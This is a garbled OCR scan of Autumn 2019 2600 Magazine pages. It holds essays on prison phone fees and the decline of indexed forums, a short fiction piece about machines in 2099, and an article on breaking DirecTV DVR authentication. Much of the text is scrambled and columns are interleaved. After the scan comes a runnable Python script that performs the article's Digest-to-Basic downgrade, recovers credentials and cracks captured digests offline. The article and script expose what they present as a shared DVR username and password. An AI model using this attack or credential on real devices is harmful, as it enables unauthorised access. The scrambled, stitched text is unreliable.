ttzoagtf lia i eiotnetAanis goitn sfoo cc d ano ltsrm hc raoatnoethnnhafm cidtaeastm uv,vyiii reoon asr nvdl)saoolb psillyneru o,vaeesh entnvpaf sijiaivao coecimianu lilalsssoi md( ltubowyeysea.sh len ttiydno bc c yho l eppclxrpoateairluihccsiigmattoschevelnoetdedysn- etettwianoimhinenn oeatdvfcnrhi ecoyse lror c’p nmslat aoppcaaktlpebocainrenotrossoduo,r t.nit wei a cpst--eIphlfforce obiewsrontekeleolhdcels’nleaesi. aer n unlcegis’ct nsneeeIo f dn t osotartuwnonem eicnomfaathenpradh.t elou,, i amt oyt hTnoaeooh yus rfeo kv’ oruiasne’cnwr t’rogeihsteeu otbh oulsetusdi hc pntptheoaero ,mgshpes e aisoasvcyeuuq ,eonrut w utcehiba’eesotruadsd-hretn ecniaowIK nfvoeeoM fesbwmtD entssamBrhti keei,aut uerd aess,sclt sfA, ioil nrr-ya syiCt ltt arhomsan futf teioon emn t cdwah doch neniayN.ayrrsr p ee c oaf wulgeTssoelwslshf is . het trotNWlseewheioo A e fktl miawlt,ab ahoG rtoserooeyu, o koi t ftg, ’lsc sna aeotnStn H.dsrah u eiielalmfsmWuaeompSain, r ul kk ryeie aAM, pwarme neoea dambndo yszooinoihtnoau tuh’e nregeluy,aselrnis s ecagtmsltohtxooe easpoua ttlepg neAo hiviFsiooenn fptClrg rgeCey idy is so n routtan hrttltsaoaueaw t scrsch n takmi aanstcaar t hnhekeeidn esna’, e t umce ta,apail hmrjnltao ioostttrs rr ahioeieedFntmwt d yCpayi tCsF tmni-iCpo’onoorhCnftgnveo e , egny rceuar .h tlltea lohsag sie ut nyFpleit rrbfarrdoeestralv gteeesou ifntdmtlda r oaeatfttser(jt ee aosbhs i am.ewll cesclaa, apr hlTrutlaahibtssevnicih)eddseege, racersfpeirrproesaeioiemklns mdmlm’oI ytsetin o mssf. isips tmcr iabh aileoes kTalinogheonsnomaeg wf. 
io e nrdsmec pths uah imucogugtwhnhotihg eehltgir l sl i usensewpdgepnbir rstaoiehcvps kmriocodidenclstber olooiro nnslptpe e mrhrp eaosh b nitonhaep nana htterdh oesta.n h tr eet a thstoee.I ftprs ofre tuod ianroskUgedemoios ss n, ine tn’rhaogtsienfin t hOsitisintzriuosartgmnetano rWianentohgdn’ noei.s u l itne tt hoooatwowuthfllt ec h him.stb ahwgaediei fcesbYs ks o Igiuontrp’yttetroohe!aiuerut”m n n eadtls m,a DY yiro,.sof u fsyo’ rio“r OnuaWelr’glg otr ewoeton m,tft ii hnsem ghsiIse is’renpms eig eimn rpnfesoagonodg t rne hmasotDal shr--tee.o - jytpaacBwunlaanoues onldut tt k o?irb cwnwfwuviagihnalnnN i anld oo tt .aiun f nybsaiot oon totWuduo l i toils tmathml fh i aiaeswsvn okudhsfeye si iom acuoSSmn mhnahaomei r rlof ipiyofynonerrafp edr o r ysomoMt ofPs bh naooeltato tomeehflhnemlefe c ’s oas.stnpo“ tol feec o uap’tocTni ystmhhasoh opleoeufyasdy ”-b se ne tliss ihosu.etelgr hWie ssii,tos n,S fkph k uioo tyrsbathwoeuthas.u,te,it s doesn’t mean the rates aren’t regulated, but it’s microcells alongside features already deployed the patterned backgrounds that never really the best girl, and why they believe that to be left to the states, some of which are better than in law enforcement “stingray” technology, seemed to fit the design of the site, but you true? No. others. Additionally, payment fees are allowed substantially all of the security features currently would miss them if they were gone. I think the first creation that started to to be charged per call, even though you can also available from prison phone providers could be It’s like going to a McDonald’s instead of strip these sites from the Internet was forums. set up an account with the prison phone provider applied to mobile phones. However, this wouldn’t your local family eatery. 
Sure, you may be Many people simply discussed these things on (the FCC requires them to allow this) and make a make jails, prisons, or prison phone providers any able to read their menu a bit clearer, and you’re forums, since it was free and didn’t require you deposit on your account in order to avoid multiple money, so the friends and family of prisoners will able to receive your food more efficiently, to create your own website. Now, this obvi- payment fees. continue paying - in effect - a “prison tax.” but there’s no personality. You don’t have a ously wasn’t the only reason - don’t forget that There are some other tricks as well. Many And with that, it’s time to rake some leaves. favorite McDonald’s cashier. You don’t get Usenet has been a thing since the 1990s, and people receiving calls from jails and prisons are Have a lovely autumn, and I'll see you again in to know the owner, and you don’t get to taste telephone BBSes since long before that. But it living on the economic margins, so they make the winter! ay personal cooking of the guy running the was still a large catalyst. \ Page 14 2600 Magazine 7 Autumn 2019 Page 15 7 i These forums create walled-in communi- click on the thread, and in it, a user has nicely \ (yo u to fully consider my wandering train of know what they do. It’s helped millions of \ ties whose knowledge becomes off-limits to summarized a lot of common engine upgrades, thought, and take in a picture of the Internet people access content and knowledge that the rest of the Internet. Chances are there have how much horsepower they make, and linked as a whole. All is not lost. There are still oddi- was previously hidden behind paywalls, or been dozens of popular forums over the years relevant threads on how to do them. Awesome! ties on the Internet, and personalized content tangled in the depths of the Internet. Things that have discussed Sailor Moon. Hundreds, From here, you can research each specific as well. 
YouTube has become the bastion of like free YouTube programming tutorials are even. But many probably required an account upgrade more, and then make a thread asking creativity - rants and interesting content that revolutionary - you no longer have to buy to read threads, and as such weren’t indexed questions when you have a more relevant ques- before could envelop an entire website are hundreds of dollars worth of textbooks to learn by Google. Or perhaps, as their membership tion that shows you’ve put some thought into now packed into a single YouTube video and programming, or sign up for classes that cost dwindled, they slowly went offline, never to be it. Of course, this magic didn’t always work on shared with an audience. This is amazing, and thousands. You can now get the same amount archived or remembered. Users on that forum forums - you would still sometimes get users YouTube is an amazing platform for doing this of information from a series of free YouTube probably had valid opinions on the show that who ignored these stickied threads and posted all for free. Additionally, the oddities of the videos, and even skip around and learn other would seem like a treasure trove to fans of their generalized questions. But there was a Internet are still out there, and they’re waiting things in-between if you want to. The flex- today - what did people think, in real-time, as path to point them to! Something obvious that for you to find them. In 2008, I thought it was ibility is second-to-none. the first season of Sailor Moon aired’? What they missed! cool that I could telnet to a random IP address Now, I'd like to hear from you, the reader. were people posting about the show online? Back to the present - why did you get and have an entire Star Wars movie play out What do you do on the Internet? How many But now, we’ll never know. flamed off of Facebook for asking your ques- in ASCII on my terminal. In 2018, I think it’s websites do you use each day? 
Why don’t you Forums were bad, but at least the ones that tion? The blame lands on the platform itself, cool that I can watch a channel on Twitch that’s run your own website? Let’s talk about your were indexed by Google are still searchable. Facebook. Users wish they didn’t have to running defragging simulations 24/7. They’re hobbies - I’m sure you’re passionate about You'll find many of these relics while looking re-explain how basic tuning works every day, both things that I never thought I would find them - why not tell people about them? Give for programming questions on the Internet - but there’s no easy way for them to pin relevant on the Internet, and never expected to enjoy yourself a platform to speak about them. Don’t rarely answered questions in a ten-plus-year- information. There’s no way to tell a user off either. Things that tickled my brain and made feel dedicated to your audience either - you old thread that has somehow achieved the for not doing their research because the user me think “wow, this is a revolutionary use of don’t need to pump out a blog post a day or highest SEO rating for your search on Google. would have to stop using Facebook to find the the Internet - more people need to know about have the prettiest site around. Just put some- But social media has stepped in to change that. . relevant information. It’s a proposition which this.” These small creations that didn’t overtly thing on the Internet, exercise the amazing Now, websites like Facebook and Twitter are perfectly breaks Facebook’s “walled garden” improve the Internet - no one asked for a defrag- power in front of you. And then email your site transforming the future of live Q&As. Let’s mentality, something that requires a user to ging simulator - but were a creative use of the to me. say you want to learn about how to make your specifically stop using Facebook to find their tools placed in front of someone. They signed I want to check out your hobbies. 
I want to sHeoanrdcah Cfiorv icg rofausptser . wYiotuh l“oHg onondtao FCaivciecb”o okin atnhde ausnesrwse r,to hasvoem ettoh idnog. Facebook doesn’t want gupa mefso,r ab utT witot chst reaacmc outnhti ngsn ott hatto tshterye aemn jovyiedde,o srehaodw wyhoaut wyaotu chtehdi nk onolfi neth.e I lawtaenstt stoe askonno w of whthaatt name. Perfect! A group specifically for Civics I will admit, that last example got a bit off and did it for no one except themselves. And you think about your laptop, and how your W of your exact generation, and it has thousands topic - it turned into a rant about the low quality yet, people have come to enjoy it. More and key sticks sometimes. of members! You join, and ask “Hey guys, I of Facebook as a platform (which is still true), more channels on Twitch are breaking the This is what created the Internet. This is have a 2001 Honda Civic. How can I make but that wasn’t its goal. Think of all of the mold of what people stream, coming up with what I loved about the Internet. This is what we it faster?” You’re immediately flamed off the advice and specific nuanced questions that creative new things to show the Internet, and can bring back to the Internet. It’s up to us to group, insulted into oblivion, and your post is have been asked and answered on that Face- I think it’s an amazing use of creativity, one shape the future of the Internet - we can make deleted by the moderators. You see, the people book group. Or on any number of the millions that rivals the Geocities websites of the early platforms that allow us to voice our opinions of this group are sick of answering the same of groups that exist on Facebook. None of that 2000s. They’re not exactly on the same plane, and share our stories while allowing others to questions over and over, but it’s because of the information is archived or searchable in any but they’re both amazing nonetheless. find them and index them and read them. We layout of Facebook’s groups that this occurs. 
accessible fashion. None of it is available on Let’s back up a bit: I know I just spoke can allow the things we create to be accessible Let’s roll it back five years. Google, and to even know that the information highly of YouTube, but it also comes with to everyone, not just those with the best SEO You want to make your Honda Civic faster. is there requires a membership to the group on issues. Videos are inherently less searchable, or most keywords in their article. You search “How to make my Civic faster” Facebook. This is the furthest possible desti- and their content is not easily indexable. The Do you disagree with me? Don’t close this on Google and are directed to the Honda-Tech nation for information, hidden not behind creation of a system to be able to do so would article and continue on with your day. Get forums. There, you see they have all sorts of paywalls like traditional journals, but instead most likely result in the loss of freedom of mad, email me - I’m a human and I'll respond. sub-forums about different model Civics, so convoluted networks and free memberships. speech for many on the platform, along with We can have a real discourse over the expanse you choose your generation. From there, it’s This is objectively worse - the information heavy moderation and micro-manageable of the Internet. Remember that everything you even more granular - sub-forums about engine isn’t made off limits by a single organization ads. So that is not what I look for. Rather, I read on the Internet was written by a human tuning, chassis modifications, tire choice, that says whether or not you can access it, but wish for others to take the information taught who probably feels like they’re throwing their paint jobs, interior, etc. You click the forum instead the information is obfuscated and made and shown within these videos and share it words into the void, hoping someone will for engine tuning, knowing that to make your almost impossible to find. 
Even if you wanted with the world. Write papers about it, create receive them and be impacted by them. Today, car faster, you normally mess with the engine. to know how to make your Honda Civic faster, websites dedicated to it, cite the videos as your I’m that human. Next time you read something You start looking down the list of threads, and Facebook as an organization would never be sources. Many people learn insane amounts on the Internet, think of the author and the time the first one jumps out at you - “READ THIS able to tell you even if they wanted to. of information from YouTube videos without they spent writing. I bet they’d like to read BEFORE MAKING A POST!!!!!!!") You While this article wanders a bit, I want eealizing it, and later can’t explain why they some of your words too. <i 16 2600 Magazine / Autumn 2019 Pagel 77 (le nge. It knows that the server will be using (base64 encoded username and password),) i Breaking DirecTV’s DVR Authentication Digest authentication and there’s no reason it which the client will surely ignore. should accept basic auth as a challenge, espe- When we do this, our client receives cially when an RFC that’s over 20 years old our spoofed server response, and obvi- by noir & GreedyHaircut plaintext HTTP response we are also able to clearly outlines this attack. ously we can see that - holy shit... the client obtain the username (cOpil0t), method (GET), But you know what, with the brute force responded with basic auth. It’s a base64, A friend recently came to me with the and digestURI (path in the requested URL). script still chugging along and having made no colon-delimited string, which decoded gives desire to build his own app to interact with his This leaves us still needing the password, progress there, let’s give it a shot. us: cOpil0t:8thSBre$Wrus. We already had the DirecTV DVR. DirecTV already has a mobile nonceCount, and cnonce. 
The cnonce is an There are several options for proxying tools username (the first part), and now we also have app to do this, but their app leaves much to be arbitrary value chosen by the client (us!) and that allow us to easily manipulate traffic. Some the password. desired. the nonceCount can just always be 00000001. personal favorites are Charles Proxy and At this point, it’s game over for the DirecTV The first place to start was to inspect the So really we just need the password. The mitmproxy. While going into detail on how DVR. We have all the pieces we need to write network traffic between the mobile app and password is the very thing that makes digest to modify traffic is beyond the scope of this a client to interact with the DVR. And not just DVR on the same network with a proxy authentication secure. The client and server article, both tools have extensive documenta- this specific DVR, but any DireeTV DVR tool like mitmproxy. When doing this, ship with the shared password known to both tion that should make it easy to learn how in that’s capable of working with the mobile app. we observed an interesting pattern with the of them, and they never have to transmit it over under an hour. Due to the nature of digest access authentica- traffic. Every time the app sent a request to the wire. Using our tool of choice, when the client tion, the password must be the same for any the server, the server would respond with In order to obtain the password, one option tries an unauthenticated request and the server DVRs that want to work with the mobile 401 Unauthorized. The app would then is to try brute force. Digest authentication is responds with a digest challenge, we will app. In order for DirecTV to re-secure these send a second request, identical to the first, used with SIP, for which a couple of brute modify that response to have an “Authenticate: communications, they will have to simultane- but this time with an authorization header. 
The forcing tools have already been created. Basic” header, indicating to the client that it ously update their mobile apps and their DVRs server would accept this second request and However, if the password being used is suffi- should authenticate itself with Basic auth to use a new pre-shared password. respond. This wouldn’t just happen once at the ciently complex, brute force is impractical. We beginning of a session. Every single request took an existing tool and tweaked it a bit to at MACHINE RHAPSODY IN 2099 would get a 401 the first time, then be repeated least start a brute force script while working on with authorization headers. some other ideas. by Duran, Hong Kong Some anti-secular people began to marry with contIanisnpeedc tinga “thWeW wWs-erAvuetr’hse nt4i01c atere”s ponhseea, deri t applWihcialteio n thatb inraarny, wiet seldf.e cidSeodm ettoi meinss pecdte vetlh-e Machines are no longer called “it”; they are machines, some for love. which included four keys: realm, gop, nonce, opers do silly things and leave files around called “he” or “she”. Man will disappear from certain professions and opaque. A quick Google of these keys with interesting information, store secret and be permanently replaced by machines. reveals the server seems to be issuing a digest values in insecure places, or don’t bother to Machines have sex because of human sexual Some positions in service industries and key authentication challenge. obfuscate strings in their binary. Knowing the and emotional needs. In the final analysis, it is A digest authentication challenge is part of username gave me a known value to search for. the progress of artificial intelligence. departments will be replaced by machines, in which human beings have lost their digest access authentication, an authentication Unfortunately, cursory searches didn’t reveal Machines no longer exist in a specific form. competitiveness. method that can be used with web servers. 
The any clues inside the binary and couldn’t even way digest authentication works is that the find a match for our username, so they seemed Machines no longer exist in a physical form; An official position is awarded to a machine. client and server each know a pre-shared secret to at least be doing something to obfuscate the they can exist in any artificial neuron unit, and (a password). When the server is responding to strings in the application binary. they can also exist in semi-biological neuron A machine was awarded Lieutenant because the client with the digest authentication chal- Somewhere in all of this we also started units. of its superiority over humans in military lenge, it’s telling the client how to authenticate skimming through the RFC for digest access decision-making. itself. The client will generate two strings: authentication (RFC 2069). Looking through Machines still follow human will unless A global controversy about machine ethic. stringl = md5(username:realm: the table of contents, one section immediately reprogrammed. password) jumped out: Security Considerations. This Asimov’s law is still valid, and no matter how This argument is based on the above facts. strTihnegs2e t=w o msdt5ri(nmgse tahreo dt:hedni guessedt UtRo Ig)e nerate section covered some of the benefits that digest advanced artificial intelligence is, it can’t Man made the first law for machines. t™rhnee osIanpf uoctwnehese Cneowt=uaimncntadt t5:i to o n( ctsanrltkoe rsnpitcoon engts:hleiq::so npoD:VnsRc ter:is enrgve2r), we’ ll awbuectlc le Sseesacf sft eiacpoutonits vhsee3i .nb3tl aiet c- taMaatctaiktno an c kwsino. h uatslh de oMvbieedr dltboe a sir- ce p“lA aaucsteih ,m ptlhaees sMthuaircnphka isnasce tsih vuemlhyaa.nv e thpoausgshitv.e perception but can't fmWioiertlhdps h itcoh,fe hpteuhenm eatfnirr astt isoolcnai we toyfo n manamdca hcihmnionereses , ian nMtavhcarrhoiiponoue-s Law, was published. have to figure out how to authenticate. 
In order Digest challenge with a Basic challenge to The perception ability of machines benefits to authenticate our response, we'll need a user- spoof the client into revealing their password.” from the development of sensors, which make First colonization of exoplanets by machine. name, realm, password, method, digestURI, Sadly, it goes on to explain how this could machines have tactile sense, but the idea of nonce, nonceCount, cnonce, and gop. be combated. In our case, the developers are machines is endowed by human beings. Based on advances in artificial intelligence The server’s challenge response gives us likely to have simply written the client code in and space technology, a machine-controlled ee realm, gop, and nonce. From the client’s a way that it wouldn’t respond to such a chal- Some people marry with machines. colony ship headed for extrasolar planets. Page 18 2600 Magazine 7 Autumn 2019 Page 19
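The digest computation, the Digest-to-Basic downgrade and the credential recovery described in the DirecTV article above, as an added runnable example; this is not the authors' code or their mitmproxy setup. The digest arithmetic follows the string1/string2/response formulas the article gives (the RFC 2617 form with qop and cnonce). The realm, nonce and opaque values are constructed, the digest test vector inside demo() is the published RFC 2617 example, mitm_downgrade stands in for the header rewrite the authors did in their proxy, and the username/password pair is the one the article reports recovering.

```python
"""Digest-to-Basic downgrade of a DVR-style exchange, modelled in plain Python.

Added example, not the article authors' code: it reproduces the protocol
steps the article describes so they can be run offline. Realm, nonce and
opaque values are constructed; the digest test vector is RFC 2617's own
example; the username/password pair is the one the article reports.
"""
import base64
import hashlib
import re
import secrets

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """The article's string1 / string2 / response, i.e. RFC 2617 Digest with qop."""
    string1 = md5_hex(f"{username}:{realm}:{password}")  # HA1: the only place the secret enters
    string2 = md5_hex(f"{method}:{uri}")                  # HA2
    return md5_hex(f"{string1}:{nonce}:{nc}:{cnonce}:{qop}:{string2}")

def parse_auth_header(header):
    """'Digest realm="x", qop=auth, nc=00000001' -> ('Digest', {'realm': 'x', ...})."""
    scheme, _, rest = header.partition(" ")
    return scheme, dict(re.findall(r'(\w+)="?([^",]*)"?', rest))

def server_challenge(realm, nonce, opaque):
    """The WWW-Authenticate value a Digest server sends with its 401 (values constructed)."""
    return f'Digest realm="{realm}", qop="auth", nonce="{nonce}", opaque="{opaque}"'

def mitm_downgrade(www_authenticate):
    """The RFC 2069 section 3.3 attack: swap the Digest challenge for a Basic one."""
    scheme, params = parse_auth_header(www_authenticate)
    if scheme != "Digest":
        return www_authenticate
    return f'Basic realm="{params.get("realm", "")}"'

def naive_client_authorize(www_authenticate, username, password, method, uri, cnonce=None):
    """Client that honours whatever scheme the challenge names (what the DVR app did)."""
    scheme, p = parse_auth_header(www_authenticate)
    if scheme == "Basic":
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        return f"Basic {token}"                      # the secret is now on the wire in the clear
    if scheme == "Digest":
        cnonce = cnonce or secrets.token_hex(8)     # arbitrary, chosen by the client
        nc = "00000001"                             # the article: always 00000001 is accepted
        resp = digest_response(username, p["realm"], password, method, uri,
                               p["nonce"], nc, cnonce, p.get("qop", "auth"))
        return (f'Digest username="{username}", realm="{p["realm"]}", nonce="{p["nonce"]}", '
                f'uri="{uri}", qop={p.get("qop", "auth")}, nc={nc}, cnonce="{cnonce}", '
                f'response="{resp}", opaque="{p.get("opaque", "")}"')
    raise ValueError(f"unsupported scheme: {scheme}")

def strict_client_authorize(www_authenticate, username, password, method, uri, cnonce=None):
    """Hardened client: the pre-shared secret is only ever used to build a Digest response."""
    scheme, _ = parse_auth_header(www_authenticate)
    if scheme != "Digest":
        raise ValueError(f"refusing downgrade from Digest to {scheme}")
    return naive_client_authorize(www_authenticate, username, password, method, uri, cnonce)

def recover_basic_credentials(authorization):
    """What the attacker reads off a Basic Authorization header: (username, password)."""
    scheme, _, token = authorization.partition(" ")
    if scheme != "Basic":
        return None
    user, _, pw = base64.b64decode(token).decode().partition(":")
    return user, pw

def offline_crack(authorization, method, wordlist):
    """The brute-force route: test candidates against one captured Digest Authorization."""
    _, p = parse_auth_header(authorization)
    for candidate in wordlist:
        if digest_response(p["username"], p["realm"], candidate, method, p["uri"],
                           p["nonce"], p["nc"], p["cnonce"], p.get("qop", "auth")) == p["response"]:
            return candidate
    return None

def demo():
    """Run the whole exchange; returns the credentials the downgrade leaks."""
    # RFC 2617 section 3.5 test vector, so the digest arithmetic can be checked by hand.
    chal = server_challenge("testrealm@host.com", "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                            "5ccc069c403ebaf9f0171e9517f40e41")
    authz = naive_client_authorize(chal, "Mufasa", "Circle Of Life", "GET",
                                   "/dir/index.html", cnonce="0a4f113b")
    assert 'response="6629fae49393a05397450978507c4ef1"' in authz
    # Downgrade: the naive client answers the Basic challenge with the pair the article found.
    leaked = naive_client_authorize(mitm_downgrade(chal), "cOpil0t", "8thSBre$Wrus", "GET", "/")
    return recover_basic_credentials(leaked)

if __name__ == "__main__":
    print(demo())  # ('cOpil0t', '8thSBre$Wrus')
```

In a mitmproxy addon the rewrite mitm_downgrade performs is one assignment to flow.response.headers["WWW-Authenticate"] inside the response(flow) hook. Two things a practitioner would check here: strict_client_authorize is the client-side fix the RFC's security considerations imply, which is to refuse any scheme other than the one the pre-shared secret was issued for (rotating the password, as the article says DirecTV would have to do, does not close the downgrade; only a client that refuses Basic, ideally behind TLS, does). offline_crack is the brute-force route the authors started with: one captured challenge/Authorization pair is enough to test candidates offline, which is why the secret's strength still matters even though it never crosses the wire. The article's observation that nc=00000001 is accepted every time means the DVR does not enforce a rising nonce count; a server that did would reject the repeated counter.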
